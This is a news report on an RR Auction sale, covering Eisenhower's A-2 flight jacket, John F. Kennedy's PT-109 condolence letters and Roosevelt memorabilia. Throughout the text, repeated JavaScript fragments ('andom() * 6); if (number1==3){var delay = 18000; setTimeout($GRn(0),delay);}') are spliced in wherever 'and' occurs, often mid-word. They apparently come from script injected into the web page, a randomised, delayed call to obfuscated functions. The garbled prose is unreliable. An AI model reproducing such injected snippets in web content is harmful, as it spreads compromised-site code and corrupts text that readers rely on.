BOSTON, MASS. — President Dwight D. Eisenhower’s World War II bomber jacket attained $93,750 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a collection of letters from John F. Kennedy to the family of lost PT-109 crewmate sold for $200,000 during RR Auction’s two-day sale September 17–18.
The letters from John F. Kennedy were sent to the family of Harold W. Marney, one of two crewmembers killed when the PT-109 boat that he commandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}anded was destroyed by a Japanese ship.
The letter reads in part: “This letter is to offer my deepest sympathy to you for the loss of your son,” he wrote shortly after the August 1943 accident. “I realize that there is nothing that I can say to make your sorrow less; particularly as I know him; andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and I know what a great loss he must be to you andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and your family.”
In addition to these letters; the Purple Heart medal posthumously awarded to Harold W. Marney, the telegram sent to the family informing them of his loss, a few photos, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and various related correspondence.
“In terms of content, this represents the pinnacle of any Kennedy wartime correspondence andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and to our knowledge are the only letters describing the PT-109 incident in depth,” said Bobby Livingston, executive vice president at RR Auction.
Other highlights from the Kennedy session, September 18, included a Robert Kennedy archive of letters to his best friend Peter MacLellan that fetched $31,250; a famous signed photo of Albert Einstein sticking out his tongue brought $125,000; the Nelson Mandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andela Freedom Torch used during a historic ceremony, $75,000; a William Barret Travis signed document for $125,000; a Mary, Queen of Scots signed document at $28,750; andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a Hugh Hefner letter andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and first printing of Playboy #1 at $12,500.
The sale kicked off the first day with the Raleigh DeGeer Amyx collection that netted $1.5 million, led by Ike’s personally owned andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and worn dark brown, Type A-2 leather flight jacket from World War II, size 42, featuring four-star epaulettes on the shoulders. The jacket has a brass Conmar zipper, brown stitching for the jacket, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and olive drab stitching for the four-star epaulette patches. The pockets feature rounded lower corners andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and an angular flap.
The lot included a detailed letter of significant provenance on White House letterhead signed by Delores Moaney, the Eisenhower family’s cook andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the widow of Sargeant John Moaney. Her husbandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and had served as Dwight D. Eisenhower’s close personal valet from 1942 until the president’s death in 1969.
“The Raleigh Degeer Amyx collection is truly one of the finest groups of presidential material RR Auction has ever offered,” said Livingston. “We are thrilled andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and extremely grateful for the impressive results that the auction has achieved.”
“There is an incredible responsibility that is attached to these items,” said Raleigh Degeer Amyx, “they are quintessential pieces of American history — passing them onto future generations is not something that can be to be taken lightly.”
Session highlights included multiple items once belonging to Franklin D. Roosevelt’s: his wool cape for $68,750, his 1933 inaugural top hat at $46,875, his walnut cane for $46,875 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and his bible at $21,250.
For additional information, www.rrauction.com or 603-732-4280.